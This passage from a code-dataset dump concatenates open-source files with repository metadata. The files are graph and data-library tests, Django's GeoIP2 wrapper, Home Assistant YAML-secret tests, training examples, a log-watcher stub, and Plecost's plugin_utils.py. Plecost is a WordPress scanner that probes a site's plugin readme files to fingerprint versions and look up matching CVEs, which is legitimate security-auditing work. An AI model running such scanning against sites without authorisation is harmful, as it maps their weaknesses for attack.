assert_equal(list(nx.square_clustering(G).values()),[1, 1, 1, 1, 1])
def test_bipartite_k5(self):
G = nx.complete_bipartite_graph(5,5)
assert_equal(list(nx.square_clustering(G).values()),
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1])
def test_lind_square_clustering(self):
"""Test C4 for figure 1 Lind et al (2005)"""
G = nx.Graph([(1,2),(1,3),(1,6),(1,7),(2,4),(2,5),
(3,4),(3,5),(6,7),(7,8),(6,8),(7,9),
(7,10),(6,11),(6,12),(2,13),(2,14),(3,15),(3,16)])
G1 = G.subgraph([1,2,3,4,5,13,14,15,16])
G2 = G.subgraph([1,6,7,8,9,10,11,12])
assert_equal(nx.square_clustering(G, [1])[1], 3/75.0)
assert_equal(nx.square_clustering(G1, [1])[1], 2/6.0)
assert_equal(nx.square_clustering(G2, [1])[1], 1/5.0)
def test_average_clustering():
G=nx.cycle_graph(3)
G.add_edge(2,3)
assert_equal(nx.average_clustering(G),(1+1+1/3.0)/4.0)
assert_equal(nx.average_clustering(G,count_zeros=True),(1+1+1/3.0)/4.0)
assert_equal(nx.average_clustering(G,count_zeros=False),(1+1+1/3.0)/3.0)
|
gpl-3.0
|
pp-mo/iris
|
lib/iris/tests/integration/test_cube.py
|
5
|
2218
|
# Copyright Iris contributors
#
# This file is part of Iris and is released under the LGPL license.
# See COPYING and COPYING.LESSER in the root of the repository for full
# licensing details.
"""Integration tests for :class:`iris.cube.Cube`."""
# Import iris.tests first so that some things can be initialised before
# importing anything else.
import iris.tests as tests
import numpy as np
import iris
from iris.analysis import MEAN
from iris.cube import Cube
from iris._lazy_data import is_lazy_data, as_lazy_data
class Test_aggregated_by(tests.IrisTest):
@tests.skip_data
def test_agg_by_aux_coord(self):
problem_test_file = tests.get_data_path(
("NetCDF", "testing", "small_theta_colpex.nc")
)
cube = iris.load_cube(problem_test_file, "air_potential_temperature")
# Test aggregating by aux coord, notably the `forecast_period` aux
# coord on `cube`, whose `_points` attribute is a lazy array.
# This test then ensures that aggregating using `points` instead is
# successful.
# First confirm we've got a lazy array.
# NB. This checks the merge process in `load_cube()` hasn't
# triggered the load of the coordinate's data.
forecast_period_coord = cube.coord("forecast_period")
self.assertTrue(is_lazy_data(forecast_period_coord.core_points()))
# Now confirm we can aggregate along this coord.
res_cube = cube.aggregated_by("forecast_period", MEAN)
res_cell_methods = res_cube.cell_methods[0]
self.assertEqual(res_cell_methods.coord_names, ("forecast_period",))
self.assertEqual(res_cell_methods.method, "mean")
class TestDataFillValue(tests.IrisTest):
def test_real(self):
data = np.ma.masked_array([1, 2, 3], [0, 1, 0], fill_value=10)
cube = Cube(data)
cube.data.fill_value = 20
self.assertEqual(cube.data.fill_value, 20)
def test_lazy(self):
data = np.ma.masked_array([1, 2, 3], [0, 1, 0], fill_value=10)
data = as_lazy_data(data)
cube = Cube(data)
cube.data.fill_value = 20
self.assertEqual(cube.data.fill_value, 20)
if __name__ == "__main__":
tests.main()
|
lgpl-3.0
|
zerc/django
|
django/contrib/gis/geoip2/base.py
|
335
|
9054
|
import os
import socket
import geoip2.database
from django.conf import settings
from django.core.validators import ipv4_re
from django.utils import six
from django.utils.ipv6 import is_valid_ipv6_address
from .resources import City, Country
# Creating the settings dictionary with any settings, if needed.
GEOIP_SETTINGS = {
'GEOIP_PATH': getattr(settings, 'GEOIP_PATH', None),
'GEOIP_CITY': getattr(settings, 'GEOIP_CITY', 'GeoLite2-City.mmdb'),
'GEOIP_COUNTRY': getattr(settings, 'GEOIP_COUNTRY', 'GeoLite2-Country.mmdb'),
}
class GeoIP2Exception(Exception):
pass
class GeoIP2(object):
# The flags for GeoIP memory caching.
# Try MODE_MMAP_EXT, MODE_MMAP, MODE_FILE in that order.
MODE_AUTO = 0
# Use the C extension with memory map.
MODE_MMAP_EXT = 1
# Read from memory map. Pure Python.
MODE_MMAP = 2
# Read database as standard file. Pure Python.
MODE_FILE = 4
# Load database into memory. Pure Python.
MODE_MEMORY = 8
cache_options = {opt: None for opt in (0, 1, 2, 4, 8)}
# Paths to the city & country binary databases.
_city_file = ''
_country_file = ''
# Initially, pointers to GeoIP file references are NULL.
_city = None
_country = None
def __init__(self, path=None, cache=0, country=None, city=None):
"""
Initialize the GeoIP object. No parameters are required to use default
settings. Keyword arguments may be passed in to customize the locations
of the GeoIP datasets.
* path: Base directory to where GeoIP data is located or the full path
to where the city or country data files (*.mmdb) are located.
Assumes that both the city and country data sets are located in
this directory; overrides the GEOIP_PATH setting.
* cache: The cache settings when opening up the GeoIP datasets. May be
an integer in (0, 1, 2, 4, 8) corresponding to the MODE_AUTO,
MODE_MMAP_EXT, MODE_MMAP, MODE_FILE, and MODE_MEMORY,
`GeoIPOptions` C API settings, respectively. Defaults to 0,
meaning MODE_AUTO.
* country: The name of the GeoIP country data file. Defaults to
'GeoLite2-Country.mmdb'; overrides the GEOIP_COUNTRY setting.
* city: The name of the GeoIP city data file. Defaults to
'GeoLite2-City.mmdb'; overrides the GEOIP_CITY setting.
"""
# Checking the given cache option.
if cache in self.cache_options:
self._cache = cache
else:
raise GeoIP2Exception('Invalid GeoIP caching option: %s' % cache)
# Getting the GeoIP data path.
if not path:
path = GEOIP_SETTINGS['GEOIP_PATH']
if not path:
raise GeoIP2Exception('GeoIP path must be provided via parameter or the GEOIP_PATH setting.')
if not isinstance(path, six.string_types):
raise TypeError('Invalid path type: %s' % type(path).__name__)
if os.path.isdir(path):
# Constructing the GeoIP database filenames using the settings
# dictionary. If the database files for the GeoLite country
# and/or city datasets exist, then try to open them.
country_db = os.path.join(path, country or GEOIP_SETTINGS['GEOIP_COUNTRY'])
if os.path.isfile(country_db):
self._country = geoip2.database.Reader(country_db, mode=cache)
self._country_file = country_db
city_db = os.path.join(path, city or GEOIP_SETTINGS['GEOIP_CITY'])
if os.path.isfile(city_db):
self._city = geoip2.database.Reader(city_db, mode=cache)
self._city_file = city_db
elif os.path.isfile(path):
# Otherwise, some detective work will be needed to figure out
# whether the given database path is for the GeoIP country or city
# databases.
reader = geoip2.database.Reader(path, mode=cache)
db_type = reader.metadata().database_type
if db_type.endswith('City'):
# GeoLite City database detected.
self._city = reader
self._city_file = path
elif db_type.endswith('Country'):
# GeoIP Country database detected.
self._country = reader
self._country_file = path
else:
raise GeoIP2Exception('Unable to recognize database edition: %s' % db_type)
else:
raise GeoIP2Exception('GeoIP path must be a valid file or directory.')
@property
def _reader(self):
if self._country:
return self._country
else:
return self._city
@property
def _country_or_city(self):
if self._country:
return self._country.country
else:
return self._city.city
def __del__(self):
# Cleanup any GeoIP file handles lying around.
if self._reader:
self._reader.close()
def __repr__(self):
meta = self._reader.metadata()
version = '[v%s.%s]' % (meta.binary_format_major_version, meta.binary_format_minor_version)
return '<%(cls)s %(version)s _country_file="%(country)s", _city_file="%(city)s">' % {
'cls': self.__class__.__name__,
'version': version,
'country': self._country_file,
'city': self._city_file,
}
def _check_query(self, query, country=False, city=False, city_or_country=False):
"Helper routine for checking the query and database availability."
# Making sure a string was passed in for the query.
if not isinstance(query, six.string_types):
raise TypeError('GeoIP query must be a string, not type %s' % type(query).__name__)
# Extra checks for the existence of country and city databases.
if city_or_country and not (self._country or self._city):
raise GeoIP2Exception('Invalid GeoIP country and city data files.')
elif country and not self._country:
raise GeoIP2Exception('Invalid GeoIP country data file: %s' % self._country_file)
elif city and not self._city:
raise GeoIP2Exception('Invalid GeoIP city data file: %s' % self._city_file)
# Return the query string back to the caller. GeoIP2 only takes IP addresses.
if not (ipv4_re.match(query) or is_valid_ipv6_address(query)):
query = socket.gethostbyname(query)
return query
def city(self, query):
"""
Return a dictionary of city information for the given IP address or
Fully Qualified Domain Name (FQDN). Some information in the dictionary
may be undefined (None).
"""
enc_query = self._check_query(query, city=True)
return City(self._city.city(enc_query))
def country_code(self, query):
"Return the country code for the given IP Address or FQDN."
enc_query = self._check_query(query, city_or_country=True)
return self.country(enc_query)['country_code']
def country_name(self, query):
"Return the country name for the given IP Address or FQDN."
enc_query = self._check_query(query, city_or_country=True)
return self.country(enc_query)['country_name']
def country(self, query):
"""
Return a dictionary with the country code and name when given an
IP address or a Fully Qualified Domain Name (FQDN). For example, both
'24.124.1.80' and 'djangoproject.com' are valid parameters.
"""
# Returning the country code and name
enc_query = self._check_query(query, city_or_country=True)
return Country(self._country_or_city(enc_query))
# #### Coordinate retrieval routines ####
def coords(self, query, ordering=('longitude', 'latitude')):
cdict = self.city(query)
if cdict is None:
return None
else:
return tuple(cdict[o] for o in ordering)
def lon_lat(self, query):
"Return a tuple of the (longitude, latitude) for the given query."
return self.coords(query)
def lat_lon(self, query):
"Return a tuple of the (latitude, longitude) for the given query."
return self.coords(query, ('latitude', 'longitude'))
def geos(self, query):
"Return a GEOS Point object for the given query."
ll = self.lon_lat(query)
if ll:
from django.contrib.gis.geos import Point
return Point(ll, srid=4326)
else:
return None
# #### GeoIP Database Information Routines ####
@property
def info(self):
"Return information about the GeoIP library and databases in use."
meta = self._reader.metadata()
return 'GeoIP Library:\n\t%s.%s\n' % (meta.binary_format_major_version, meta.binary_format_minor_version)
@classmethod
def open(cls, full_path, cache):
return GeoIP2(full_path, cache)
|
bsd-3-clause
|
Julian/home-assistant
|
tests/util/test_yaml.py
|
5
|
8377
|
"""Test Home Assistant yaml loader."""
import io
import unittest
import os
import tempfile
from homeassistant.util import yaml
import homeassistant.config as config_util
from tests.common import get_test_config_dir
class TestYaml(unittest.TestCase):
"""Test util.yaml loader."""
def test_simple_list(self):
"""Test simple list."""
conf = "config:\n - simple\n - list"
with io.StringIO(conf) as f:
doc = yaml.yaml.safe_load(f)
assert doc['config'] == ["simple", "list"]
def test_simple_dict(self):
"""Test simple dict."""
conf = "key: value"
with io.StringIO(conf) as f:
doc = yaml.yaml.safe_load(f)
assert doc['key'] == 'value'
def test_duplicate_key(self):
"""Test simple dict."""
conf = "key: thing1\nkey: thing2"
try:
with io.StringIO(conf) as f:
yaml.yaml.safe_load(f)
except Exception:
pass
else:
assert 0
def test_enviroment_variable(self):
"""Test config file with enviroment variable."""
os.environ["PASSWORD"] = "secret_password"
conf = "password: !env_var PASSWORD"
with io.StringIO(conf) as f:
doc = yaml.yaml.safe_load(f)
assert doc['password'] == "secret_password"
del os.environ["PASSWORD"]
def test_invalid_enviroment_variable(self):
"""Test config file with no enviroment variable sat."""
conf = "password: !env_var PASSWORD"
try:
with io.StringIO(conf) as f:
yaml.yaml.safe_load(f)
except Exception:
pass
else:
assert 0
def test_include_yaml(self):
"""Test include yaml."""
with tempfile.NamedTemporaryFile() as include_file:
include_file.write(b"value")
include_file.seek(0)
conf = "key: !include {}".format(include_file.name)
with io.StringIO(conf) as f:
doc = yaml.yaml.safe_load(f)
assert doc["key"] == "value"
def test_include_dir_list(self):
"""Test include dir list yaml."""
with tempfile.TemporaryDirectory() as include_dir:
file_1 = tempfile.NamedTemporaryFile(dir=include_dir,
suffix=".yaml", delete=False)
file_1.write(b"one")
file_1.close()
file_2 = tempfile.NamedTemporaryFile(dir=include_dir,
suffix=".yaml", delete=False)
file_2.write(b"two")
file_2.close()
conf = "key: !include_dir_list {}".format(include_dir)
with io.StringIO(conf) as f:
doc = yaml.yaml.safe_load(f)
assert sorted(doc["key"]) == sorted(["one", "two"])
def test_include_dir_named(self):
"""Test include dir named yaml."""
with tempfile.TemporaryDirectory() as include_dir:
file_1 = tempfile.NamedTemporaryFile(dir=include_dir,
suffix=".yaml", delete=False)
file_1.write(b"one")
file_1.close()
file_2 = tempfile.NamedTemporaryFile(dir=include_dir,
suffix=".yaml", delete=False)
file_2.write(b"two")
file_2.close()
conf = "key: !include_dir_named {}".format(include_dir)
correct = {}
correct[os.path.splitext(os.path.basename(file_1.name))[0]] = "one"
correct[os.path.splitext(os.path.basename(file_2.name))[0]] = "two"
with io.StringIO(conf) as f:
doc = yaml.yaml.safe_load(f)
assert doc["key"] == correct
def test_include_dir_merge_list(self):
"""Test include dir merge list yaml."""
with tempfile.TemporaryDirectory() as include_dir:
file_1 = tempfile.NamedTemporaryFile(dir=include_dir,
suffix=".yaml", delete=False)
file_1.write(b"- one")
file_1.close()
file_2 = tempfile.NamedTemporaryFile(dir=include_dir,
suffix=".yaml", delete=False)
file_2.write(b"- two\n- three")
file_2.close()
conf = "key: !include_dir_merge_list {}".format(include_dir)
with io.StringIO(conf) as f:
doc = yaml.yaml.safe_load(f)
assert sorted(doc["key"]) == sorted(["one", "two", "three"])
def test_include_dir_merge_named(self):
"""Test include dir merge named yaml."""
with tempfile.TemporaryDirectory() as include_dir:
file_1 = tempfile.NamedTemporaryFile(dir=include_dir,
suffix=".yaml", delete=False)
file_1.write(b"key1: one")
file_1.close()
file_2 = tempfile.NamedTemporaryFile(dir=include_dir,
suffix=".yaml", delete=False)
file_2.write(b"key2: two\nkey3: three")
file_2.close()
conf = "key: !include_dir_merge_named {}".format(include_dir)
with io.StringIO(conf) as f:
doc = yaml.yaml.safe_load(f)
assert doc["key"] == {
"key1": "one",
"key2": "two",
"key3": "three"
}
def load_yaml(fname, string):
"""Write a string to file and return the parsed yaml."""
with open(fname, 'w') as file:
file.write(string)
return config_util.load_yaml_config_file(fname)
class FakeKeyring():
"""Fake a keyring class."""
def __init__(self, secrets_dict):
"""Store keyring dictionary."""
self._secrets = secrets_dict
# pylint: disable=protected-access
def get_password(self, domain, name):
"""Retrieve password."""
assert domain == yaml._SECRET_NAMESPACE
return self._secrets.get(name)
class TestSecrets(unittest.TestCase):
"""Test the secrets parameter in the yaml utility."""
def setUp(self): # pylint: disable=invalid-name
"""Create & load secrets file."""
config_dir = get_test_config_dir()
self._yaml_path = os.path.join(config_dir,
config_util.YAML_CONFIG_FILE)
self._secret_path = os.path.join(config_dir, 'secrets.yaml')
load_yaml(self._secret_path,
'http_pw: pwhttp\n'
'comp1_un: un1\n'
'comp1_pw: pw1\n'
'stale_pw: not_used\n'
'logger: debug\n')
self._yaml = load_yaml(self._yaml_path,
'http:\n'
' api_password: !secret http_pw\n'
'component:\n'
' username: !secret comp1_un\n'
' password: !secret comp1_pw\n'
'')
def tearDown(self): # pylint: disable=invalid-name
"""Clean up secrets."""
for path in [self._yaml_path, self._secret_path]:
if os.path.isfile(path):
os.remove(path)
def test_secrets_from_yaml(self):
"""Did secrets load ok."""
expected = {'api_password': 'pwhttp'}
self.assertEqual(expected, self._yaml['http'])
expected = {
'username': 'un1',
'password': 'pw1'}
self.assertEqual(expected, self._yaml['component'])
def test_secrets_keyring(self):
"""Test keyring fallback & get_password."""
yaml.keyring = None # Ensure its not there
yaml_str = 'http:\n api_password: !secret http_pw_keyring'
with self.assertRaises(yaml.HomeAssistantError):
load_yaml(self._yaml_path, yaml_str)
yaml.keyring = FakeKeyring({'http_pw_keyring': 'yeah'})
_yaml = load_yaml(self._yaml_path, yaml_str)
self.assertEqual({'http': {'api_password': 'yeah'}}, _yaml)
def test_secrets_logger_removed(self):
"""Ensure logger: debug was removed."""
with self.assertRaises(yaml.HomeAssistantError):
load_yaml(self._yaml_path, 'api_password: !secret logger')
|
mit
|
xinfang/face-recognize
|
tests/openface_neural_net_training_tests.py
|
5
|
3071
|
# OpenFace training tests.
#
# Copyright 2015-2016 Carnegie Mellon University
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import shutil
import sys
import numpy as np
np.set_printoptions(precision=2)
import pandas as pd
import tempfile
from subprocess import Popen, PIPE
openfaceDir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
modelDir = os.path.join(openfaceDir, 'models')
exampleImages = os.path.join(openfaceDir, 'images', 'examples')
lfwSubset = os.path.join(openfaceDir, 'data', 'lfw-subset')
def test_dnn_training():
assert os.path.isdir(
lfwSubset), "Get lfw-subset by running ./data/download-lfw-subset.sh"
imgWorkDir = tempfile.mkdtemp(prefix='OpenFaceTrainingTest-Img-')
cmd = [sys.executable, os.path.join(openfaceDir, 'util', 'align-dlib.py'),
os.path.join(lfwSubset, 'raw'), 'align', 'outerEyesAndNose',
os.path.join(imgWorkDir, 'aligned')]
p = Popen(cmd, stdout=PIPE, stderr=PIPE, universal_newlines=True)
(out, err) = p.communicate()
print(out)
print(err)
assert p.returncode == 0
cmd = [sys.executable, os.path.join(openfaceDir, 'util', 'align-dlib.py'),
os.path.join(lfwSubset, 'raw'), 'align', 'outerEyesAndNose',
os.path.join(imgWorkDir, 'aligned')]
p = Popen(cmd, stdout=PIPE, stderr=PIPE, universal_newlines=True)
(out, err) = p.communicate()
print(out)
print(err)
assert p.returncode == 0
netWorkDir = tempfile.mkdtemp(prefix='OpenFaceTrainingTest-Net-')
saveDir = os.path.join(netWorkDir, '1')
cmd = ['th', './main.lua',
'-data', os.path.join(imgWorkDir, 'aligned'),
'-modelDef', '../models/openface/nn4.def.lua',
'-peoplePerBatch', '3',
'-imagesPerPerson', '10',
'-nEpochs', '10',
'-epochSize', '1',
'-cache', netWorkDir,
'-save', saveDir,
'-cuda', '-cudnn', '-testing',
'-nDonkeys', '-1']
p = Popen(cmd, stdout=PIPE, stderr=PIPE,
cwd=os.path.join(openfaceDir, 'training'), universal_newlines=True)
(out, err) = p.communicate()
print(out)
print(err)
assert p.returncode == 0
# Training won't make much progress on lfw-subset, but as a sanity check,
# make sure the training code runs and doesn't get worse than 0.2.
trainLoss = pd.read_csv(os.path.join(saveDir, 'train.log'),
sep='\t').as_matrix()[:, 0]
assert np.mean(trainLoss) < 0.3
shutil.rmtree(imgWorkDir)
shutil.rmtree(netWorkDir)
|
apache-2.0
|
youprofit/shogun
|
examples/undocumented/python_modular/structure_multiclass_bmrm.py
|
15
|
2927
|
#!/usr/bin/env python
import numpy as np
def gen_data(num_classes,num_samples,dim):
np.random.seed(0)
covs = np.array([[[0., -1. ], [2.5, .7]],
[[3., -1.5], [1.2, .3]],
[[ 2, 0 ], [ .0, 1.5 ]]])
X = np.r_[np.dot(np.random.randn(num_samples, dim), covs[0]) + np.array([0, 10]),
np.dot(np.random.randn(num_samples, dim), covs[1]) + np.array([-10, -10]),
np.dot(np.random.randn(num_samples, dim), covs[2]) + np.array([10, -10])];
Y = np.hstack((np.zeros(num_samples), np.ones(num_samples), 2*np.ones(num_samples)))
return X, Y
# Number of classes
M = 3
# Number of samples of each class
N = 50
# Dimension of the data
dim = 2
traindat, label_traindat = gen_data(M,N,dim)
parameter_list = [[traindat,label_traindat]]
def structure_multiclass_bmrm(fm_train_real=traindat,label_train_multiclass=label_traindat):
from modshogun import MulticlassSOLabels, LabelsFactory
from modshogun import RealFeatures
from modshogun import SOSVMHelper
from modshogun import BMRM, PPBMRM, P3BMRM
from modshogun import MulticlassModel, DualLibQPBMSOSVM, RealNumber
labels = MulticlassSOLabels(label_train_multiclass)
features = RealFeatures(fm_train_real.T)
model = MulticlassModel(features, labels)
sosvm = DualLibQPBMSOSVM(model, labels, 1.0)
# BMRM
sosvm.set_solver(BMRM)
sosvm.set_verbose(True)
sosvm.train()
bmrm_out = LabelsFactory.to_multiclass_structured(sosvm.apply())
count = 0
for i in range(bmrm_out.get_num_labels()):
yi_pred = RealNumber.obtain_from_generic(bmrm_out.get_label(i))
if yi_pred.value == label_train_multiclass[i]:
count = count + 1
#print("BMRM: Correct classification rate: %0.2f" % ( 100.0*count/bmrm_out.get_num_labels() ))
#hp = sosvm.get_helper()
#print hp.get_primal_values()
#print hp.get_train_errors()
# PPBMRM
w = np.zeros(model.get_dim())
sosvm.set_w(w)
sosvm.set_solver(PPBMRM)
sosvm.set_verbose(True)
sosvm.train()
ppbmrm_out = LabelsFactory.to_multiclass_structured(sosvm.apply())
count = 0
for i in range(ppbmrm_out.get_num_labels()):
yi_pred = RealNumber.obtain_from_generic(ppbmrm_out.get_label(i))
if yi_pred.value == label_train_multiclass[i]:
count = count + 1
#print("PPBMRM: Correct classification rate: %0.2f" % ( 100.0*count/ppbmrm_out.get_num_labels() ))
# P3BMRM
w = np.zeros(model.get_dim())
sosvm.set_w(w)
sosvm.set_solver(P3BMRM)
sosvm.set_verbose(True)
sosvm.train()
p3bmrm_out = LabelsFactory.to_multiclass_structured(sosvm.apply())
count = 0
for i in range(p3bmrm_out.get_num_labels()):
yi_pred = RealNumber.obtain_from_generic(p3bmrm_out.get_label(i))
if yi_pred.value == label_train_multiclass[i]:
count = count + 1
#print("P3BMRM: Correct classification rate: %0.2f" % ( 100.0*count/p3bmrm_out.get_num_labels() ))
return bmrm_out, ppbmrm_out, p3bmrm_out
if __name__=='__main__':
print('SO multiclass model with bundle methods')
a,b,c=structure_multiclass_bmrm(*parameter_list[0])
|
gpl-3.0
|
iniqua/plecost
|
plecost_lib/libs/plugins_utils.py
|
1
|
9305
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Plecost: Wordpress vulnerabilities finder
#
# @url: http://iniqua.com/labs/
# @url: https://github.com/iniqua/plecost
#
# @author:Francisco J. Gomez aka ffranz (http://iniqua.com/)
# @author:Daniel Garcia aka cr0hn (http://www.cr0hn.com/me/)
#
# Copyright (c) 2015, Iniqua Team
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import re
import asyncio
from os.path import join
from functools import partial
from urllib.parse import urljoin
from .data import PlecostPluginInfo
from .utils import colorize, get_diff_ratio, ConcurrentDownloader, get_data_folder
exp = re.compile(r"([Ss]table tag:[\s]*)([\svV]*[0-9\.]+|trunk)")
exp_change_log = re.compile(r"([\=\-]\s*)([\d]+\.[\d]+\.*[\d]*\.*[\d]*\.*[\d]*\.*[\d]*)(\s*[\=\-])")
# ----------------------------------------------------------------------
def _url_generator(url_base, data):
"""
This functions download and URL, if pass callback function validation.
:param url_base: Base url where looking for plugins
:type url_base: basestring
:param data: list with plugin info. This list comes from csv iteration. Format:
data[0] => plugin uri
data[1] => plugin name
data[2] => plugin last version
data[3] => CVEs, separated by "|" character.
:type data: list
:return: list of URLs generated
:rtype: list(str)
"""
urls_plugin_regex = {
"readme.txt": exp,
"README.txt": exp,
}
results = []
# Test each URL with possible plugin version info
for target, regex in urls_plugin_regex.items():
_path = "wp-content/plugins/%s/%s" % (data[0], target)
# Make Plugin url
results.append(urljoin(url_base, _path))
return results
# ----------------------------------------------------------------------
def _plugin_analyze(data_map, error_page, db, log, url, headers, status, content):
"""
This functions download and URL, if pass callback function validation.
:param data_map: a dict with with plugin info, into a list. This list comes from csv iteration. Format:
{
plugin_name: [
[0] => plugin uri
[1] => plugin name
[2] => plugin last version
[3] => CVEs, separated by "|" character.
]
}
:type data_map: dict(str: list)
:param error_page: Error page content as raw.
:type error_page: basestring
:param db: cve database instance
:type db: DB
:param log: logging function, as format: log(message, level)
:type log: function
:param url: current plugin URL to analyze
:type url: str
:param headers: dict with HTTP headers response
:type headers: dict
:param status: HTTP status response
:type status: int
:param content: Response of HTTP query
:type content: str
:return: PlecostPluginInfo instance
:rtype: PlecostPluginInfo|None
"""
if content is None:
return None
data = data_map[url]
# Plugin properties
plugin_uri, plugin_name, plugin_last_version = data
# --------------------------------------------------------------------------
# Looking for plugin info
# --------------------------------------------------------------------------
plugin_installed_version = None
if status == 403: # Installed, but inaccessible
plugin_installed_version = "Unknown"
elif status == 200:
# Check if page is and non-generic not found page with 404 code
if get_diff_ratio(error_page, content) < 0.52:
# Find the version
tmp_version = exp.search(content)
if tmp_version is not None:
plugin_installed_version = tmp_version.group(2)
# Try to improve version, looking for into changelog
if plugin_installed_version is None or plugin_installed_version == "trunk":
tmp_version_change_log = exp_change_log.search(content)
if tmp_version_change_log is not None:
plugin_installed_version = tmp_version_change_log.group(2)
# Store info
if plugin_installed_version is not None:
# --------------------------------------------------------------------------
# Looking for CVE
# --------------------------------------------------------------------------
cves = db.query_plugin(plugin_uri.replace("_", "-"),
plugin_name,
plugin_installed_version)
plugin = PlecostPluginInfo(current_version=plugin_installed_version,
last_version=plugin_last_version,
plugin_name=plugin_name,
plugin_uri=url,
cves=cves)
text = ("\n <%(symbol)s> Plugin found: %(name)s\n"
" |_Latest version: %(last)s\n"
" |_Installed version: %(curr)s"
) % {
"symbol": colorize("!", "red") if plugin.is_outdated else "i",
"name": colorize(plugin.plugin_name, "blue"),
"last": colorize(plugin.latest_version),
"curr": colorize(plugin.current_version, "red") if plugin.is_outdated else plugin.current_version}
# Print
log(text)
# Print CVE list
if plugin.cves:
log("\n |_CVE list:\n")
for cve in list(set(plugin.cves)):
text = (
" |__%(cve)s: (http://cve.mitre.org/cgi-bin/cvename.cgi?name=%(cve)s)\n"
) % {"cve": colorize(cve, "red")}
log(text)
else:
text = (
"\n |_CVEs: %(text)s"
) % {"text": colorize("NO CVEs found for this plugin",
"green")}
log(text)
return plugin # Plugin found -> not more URL test for this plugin
else:
return None
# ----------------------------------------------------------------------
@asyncio.coroutine
def plugins_testing(url,
session,
error_page,
log,
data_list,
db,
concurrency=4,
ignore_403=False,
loop=None,
con=None):
"""
Try to find plugins in remote url
:param url: Base url to test the URL list
:type url: str
:param data_list: list of urls to test
:type data_list: list
:param db: cve database instance
:type db: DB
:param concurrency: max concurrency to process URLs
:type concurrency: int
:return: URLs of plugins and if pass check function or not. Format: [("url_to_plugin", True)]
:rtype: list((str, Bool))
"""
if not isinstance(url, str):
raise TypeError("Expected basestring, got '%s' instead" % type(url))
if not isinstance(concurrency, int):
raise TypeError("Expected int, got '%s' instead" % type(concurrency))
# Make URLs
urls = {}
for x in data_list:
for u in _url_generator(url, x):
urls[u] = x
# Map function
fn = partial(_plugin_analyze, urls, error_page, db, log)
# Prepare concurrent connections
cr = ConcurrentDownloader(fn,
session=session,
max_tasks=concurrency,
loop=loop,
ignore_403=ignore_403,
max_redirects=0)
cr.add_url_list(urls)
# Run and wait!
yield from cr.run()
return cr.results
__all__ = ("plugins_testing", )
|
bsd-3-clause
|
djaodjin/drop
|
src/dlogwatch.py
|
1
|
6707
|
#!/usr/bin/env python
#
# Copyright (c) 2020, DjaoDjin inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import argparse, hashlib, json, logging, re, select, sys
import six, boto3
from six.moves.urllib.parse import urlparse
from systemd import journal
__version__ = None
LOGGER = logging.getLogger(__name__)
APP_NAME = 'djaoapp'
S3_LOGS_BUCKET = 'djaoapp-logs'
PAT = None
exception_start_pat = re.compile(r"ERROR (?P<remote_addr>.+) (?P<username>.+) \[(?P<asctime>.+)\] Internal Server Error: (?P<http_path>.+) \"(?P<http_user_agent>.+)\"")
traceback_start_pat = re.compile(r"^Traceback \(most recent call last\):")
file_lineno_pat = re.compile(r"\s+File \"(?P<filename>.+)\", line (?P<lineno>\d+), in (?P<function>\S+)")
exception_class_pat = re.compile(r"^(?P<exception_type>\S+):\s+\S+")
EXCEPTION_START = 0
TRACEBACK_START = 1
